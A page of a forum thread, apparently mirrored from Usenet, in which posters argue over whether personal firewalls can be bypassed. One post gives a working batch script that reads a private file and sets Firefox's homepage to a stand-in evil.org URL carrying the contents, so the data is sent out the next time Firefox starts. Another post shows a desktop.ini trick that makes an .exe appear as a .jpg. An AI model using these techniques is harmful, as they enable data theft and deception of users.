Page 2 of 3 FirstFirst 123 LastLast
Results 21 to 40 of 51

Thread: Microsoft Firewall vs ????

  1. #21
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Sebastian G. wrote:

    > Seems like you don't even understand the difference between random and
    > systematic errors...


    Still waiting for your proof. BTW, so are some other people over at a
    reputable web forum. They claim you are a Usenet loon and have no actual
    proof. Put up or shut up.

  2. #22
    Volker Birk
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary <dead@rat.here> wrote:
    > I saw you once post proof of concept code to prove that any software
    > firewall can be bypassed. Would you please post that again as I want to
    > read it again, thanks.


    Hi,

    for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).

    After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    breakout-wp.cpp - and they lost again.

    This topic is somewhat boring now.

    Yours,
    VB.
    --
    The file name of an indirect node file is the string "iNode" immediately
    followed by the link reference converted to decimal text, with no leading
    zeroes. For example, an indirect node file with link reference 123 would
    have the name "iNode123". - HFS Plus Volume Format, MacOS X

  3. #23
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:

    > Sebastian G. wrote:
    >
    >> Which supports my claim, since this one is even worse.
    >>
    >> OK, one shouldn't expect much if any understanding of security from a
    >> Windows Live Mail user... but please, if you have no clue, then please
    >> don't make suggestions to others.

    >
    > I saw you once post proof of concept code to prove that any software
    > firewall can be bypassed. Would you please post that again as I want to
    > read it again, thanks.



    You mean something like this one?

    setlocal enabledelayedexpansion
    set x=
    for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
    for /r %%i in (prefs.js) do echo
    user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!");>>"%%i"

    And then just wait until the user starts Firefox...

  4. #24
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:

    > Sebastian G. wrote:
    >
    >> Seems like you don't even understand the difference between random and
    >> systematic errors...

    >
    > Still waiting for your proof.



    Are you really too stupid to simply write a desktop.ini with the content:

    [LocalizedFilenames]
    foo.exe=bar.jpg

    and place it onto your desktop?

  5. #25
    Victek
    Guest

    Re: Microsoft Firewall vs ????

    >> I saw you once post proof of concept code to prove that any software
    >> firewall can be bypassed. Would you please post that again as I want to
    >> read it again, thanks.

    >
    > Hi,
    >
    > for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    > and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >
    > After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    > breakout-wp.cpp - and they lost again.
    >
    > This topic is somewhat boring now.
    >
    > Yours,
    > VB.


    No security is perfect. Why does the fact you can break it imply that it
    has no value?


  6. #26
    Victek
    Guest

    Re: Microsoft Firewall vs ????

    >> I saw you once post proof of concept code to prove that any software
    >> firewall can be bypassed. Would you please post that again as I want to
    >> read it again, thanks.

    >
    > Hi,
    >
    > for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    > and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >
    > After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    > breakout-wp.cpp - and they lost again.
    >
    > This topic is somewhat boring now.
    >
    > Yours,
    > VB.


    No security is perfect. Why does the fact you can break it imply that it
    has no value?


  7. #27
    Volker Birk
    Guest

    Re: Microsoft Firewall vs ????

    Victek <victek@invalid.invalid> wrote:
    >>> I saw you once post proof of concept code to prove that any software
    >>> firewall can be bypassed. Would you please post that again as I want to
    >>> read it again, thanks.

    >> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    >> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    >> breakout-wp.cpp - and they lost again.
    >> This topic is somewhat boring now.

    > No security is perfect. Why does the fact you can break it imply that it
    > has no value?


    Because I needed 15 minutes to break the first time, and a meal with
    friends on a Saturday evening to **** up the second time.

    And: we had a closer look onto common "Personal Firewall"
    implementations, and all what I saw was a terrible, incompetent mess.

    Yours,
    VB.
    --
    The file name of an indirect node file is the string "iNode" immediately
    followed by the link reference converted to decimal text, with no leading
    zeroes. For example, an indirect node file with link reference 123 would
    have the name "iNode123". - HFS Plus Volume Format, MacOS X

  8. #28
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Victek wrote:

    >>> I saw you once post proof of concept code to prove that any software
    >>> firewall can be bypassed. Would you please post that again as I want to
    >>> read it again, thanks.

    >> Hi,
    >>
    >> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    >> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >>
    >> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    >> breakout-wp.cpp - and they lost again.
    >>
    >> This topic is somewhat boring now.
    >>
    >> Yours,
    >> VB.

    >
    > No security is perfect. Why does the fact you can break it imply that it
    > has no value?


    Security requires reliability. The above shows a reliability of zero.

  9. #29
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Sebastian G. wrote:

    >
    > Are you really too stupid to simply write a desktop.ini with the content:
    >
    > [LocalizedFilenames]
    > foo.exe=bar.jpg
    >
    > and place it onto your desktop?


    I'm talking about all of your claims and not just that one. Calling me
    stupid does nothing for your credibility at all so either stop with the
    hostile attitude and provide your own proof of concept or admit you are
    a liar and nothing but a Usenet loon.

  10. #30
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:


    > I'm talking about all of your claims and not just that one. Calling me
    > stupid does nothing for your credibility at all so either stop with the
    > hostile attitude and provide your own proof of concept or admit you are
    > a liar and nothing but a Usenet loon.



    Or not willing to waste my time on trivial things that I consider being easy
    enough for you to figure it out on your own. As if I would care what you're
    thinking of me...

  11. #31
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Sebastian G. wrote:

    > Or not willing to waste my time on trivial things that I consider being
    > easy enough for you to figure it out on your own. As if I would care
    > what you're thinking of me...


    Here's what my man on the inside has to say to you. Loon!

    "Neither the batch commands, nor the .c programs are remote exploits of
    a firewall. The batch files just seems to copy prefs.js around the
    system, it doesn't attain Admin from a limited user nor does it execute
    code on remote sysems, so it's not an exploit. Ditto for the .c
    programs, they just send messages to other windows, windows is designed
    to allow that. That is not demostration of a remote exploit or local
    privilege escalation exploit.

    Also, in Vista you can't send a high integrity process (admin services
    and programs with admin privileges) a message from a lower integrity
    processes, like say medium integrity (non-UAC prompting programs)
    processes or low integrity processes (sandboxed programs like IE7). And
    neither can low integrity processes send message to medium integrity
    processes.
    Ergo, something like this might work in XP but not in Vista if you run
    as the system was designed to run (with UAC on).

    What you asked about is Vista, and these are not Vista exploits."

  12. #32
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Volker Birk wrote:

    > Hi,
    >
    > for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    > and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >
    > After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    > breakout-wp.cpp - and they lost again.
    >
    > This topic is somewhat boring now.
    >
    > Yours,
    > VB.


    Man on the inside says this.

    "Neither the batch commands, nor the .c programs are remote exploits of
    a firewall. The batch files just seems to copy prefs.js around the
    system, it doesn't attain Admin from a limited user nor does it execute
    code on remote sysems, so it's not an exploit. Ditto for the .c
    programs, they just send messages to other windows, windows is designed
    to allow that. That is not demostration of a remote exploit or local
    privilege escalation exploit.

    Also, in Vista you can't send a high integrity process (admin services
    and programs with admin privileges) a message from a lower integrity
    processes, like say medium integrity (non-UAC prompting programs)
    processes or low integrity processes (sandboxed programs like IE7). And
    neither can low integrity processes send message to medium integrity
    processes.
    Ergo, something like this might work in XP but not in Vista if you run
    as the system was designed to run (with UAC on).

    What you asked about is Vista, and these are not Vista exploits."

  13. #33
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Sebastian G. wrote:

    > Yes. Windows Vista is trivially insecure.


    Care to comment on the below?

    http://dvlabs.tippingpoint.com/blog/...ay-and-wrap-up

  14. #34
    Volker Birk
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary <dead@rat.here> wrote:
    > Volker Birk wrote:
    >> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
    >> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
    >> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
    >> breakout-wp.cpp - and they lost again.
    >> This topic is somewhat boring now.

    > Man on the inside says this.
    > "Neither the batch commands, nor the .c programs are remote exploits of
    > a firewall.


    What "batch files"? Is this text about something else?

    > What you asked about is Vista, and these are not Vista exploits."


    I did not talk about Vista, but about "Personal Firewalls".

    And I'm not talking about remote exploits or exploits at all.

    Yours,
    VB.
    --
    The file name of an indirect node file is the string "iNode" immediately
    followed by the link reference converted to decimal text, with no leading
    zeroes. For example, an indirect node file with link reference 123 would
    have the name "iNode123". - HFS Plus Volume Format, MacOS X

  15. #35
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Volker Birk wrote:

    > What "batch files"? Is this text about something else?


    Se3astion posted a batch file that I included in with your code. He is
    referring to that.


    > I did not talk about Vista, but about "Personal Firewalls".
    >
    > And I'm not talking about remote exploits or exploits at all.
    >
    > Yours,
    > VB.


    You're right.

  16. #36
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:

    > Sebastian G. wrote:
    >
    >> Yes. Windows Vista is trivially insecure.

    >
    > Care to comment on the below?
    >
    > http://dvlabs.tippingpoint.com/blog/...ay-and-wrap-up



    Obviously the guy wanted the MacBook Air (I'd want it too), and the guys who
    wanted the Wintel notebook didn't manage to prepare the pre-made IE exploits
    fast enough.

  17. #37
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:

    > Sebastian G. wrote:
    >
    >> Or not willing to waste my time on trivial things that I consider being
    >> easy enough for you to figure it out on your own. As if I would care
    >> what you're thinking of me...

    >
    > Here's what my man on the inside has to say to you. Loon!



    See below for the obvious reasons why I don't care for the opinions of idiots...

    > "Neither the batch commands, nor the .c programs are remote exploits of
    > a firewall.



    I never claimed a remote exploit.

    > The batch files just seems to copy prefs.js around the
    > system,



    ********. It reads the context of a file, puts in into a URL and writes to
    prefs.js to set it as the default homepage. The next time the user starts up
    Firefox, the homepage is surfed to, and the data are transmitted this way.

    > it doesn't attain Admin from a limited user nor does it execute
    > code on remote sysems, so it's not an exploit. Ditto for the .c
    > programs, they just send messages to other windows, windows is designed
    > to allow that. That is not demostration of a remote exploit or local
    > privilege escalation exploit.



    But it is an exploit against the application security feature of personal
    firewalls.

    > Also, in Vista you can't send a high integrity process (admin services
    > and programs with admin privileges) a message from a lower integrity
    > processes, like say medium integrity (non-UAC prompting programs)
    > processes or low integrity processes (sandboxed programs like IE7).



    Wrong as well. Clipboard commands, NetDDE and COM+ Remoting are allowed,
    also Named Pipes, Mailslots, Shared Sections, BaseNameObjects, JobObjects
    etc. are shared.

    > What you asked about is Vista, and these are not Vista exploits."



    Never claimed those to be Vista exploits, even though they work quite well
    under Vista.

  18. #38
    Rat River Cemetary
    Guest

    Re: Microsoft Firewall vs ????

    Sebastian G. wrote:

    > Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
    > who wanted the Wintel notebook didn't manage to prepare the pre-made IE
    > exploits fast enough.



    IE7 on Vista runs in protected mode and is the most secure browser there
    is because of it. Unless of course you run something like OB1 that
    doesn't support any scripting at all. Because of your hostile attitude
    and lack of objectivity I must end our conversation because you are not
    worth my time and are a nasty ********ter. I hope others are smart
    enough to see you for what you really are.

  19. #39
    Sebastian G.
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary wrote:

    > Sebastian G. wrote:
    >
    >> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
    >> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
    >> exploits fast enough.

    >
    >
    > IE7 on Vista runs in protected mode and is the most secure browser there
    > is because of it.



    Nonsense. IE by itself is as easy to compromise as ever, and breaking out of
    the protected mode is trivial[1][2].

    > Because of your hostile attitude
    > and lack of objectivity I must end our conversation because you are not
    > worth my time and are a nasty ********ter. I hope others are smart
    > enough to see you for what you really are.


    One should rather hope that others are smart enough to not fall for your
    obviously ridiculous claims about others.

    [1] http://uninformed.org/?v=8&a=6&t=sumry
    [2] http://blogs.technet.com/markrussino...12/638372.aspx

  20. #40
    Volker Birk
    Guest

    Re: Microsoft Firewall vs ????

    Rat River Cemetary <dead@rat.here> wrote:
    > IE7 on Vista runs in protected mode and is the most secure browser there
    > is because of it.


    Unless IE stops supporting ActiveX and thus supporting manipulating
    arbitrary COM objects, it's a security nightmare and not "the most
    secure browser".

    ActiveX is a design flaw, and never can be fixed.

    Yours,
    VB.
    --
    The file name of an indirect node file is the string "iNode" immediately
    followed by the link reference converted to decimal text, with no leading
    zeroes. For example, an indirect node file with link reference 123 would
    have the name "iNode123". - HFS Plus Volume Format, MacOS X

Similar Threads

  1. Microsoft Windows Malicious Software Removal Tool!
    By fords8 in forum Software Forum
    Replies: 8
    Last Post: 04-06-15, 09:08 AM
  2. winantivirus again
    By robertdempster in forum Software Forum
    Replies: 12
    Last Post: 02-20-07, 08:57 AM
  3. Replies: 27
    Last Post: 09-29-06, 03:39 PM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •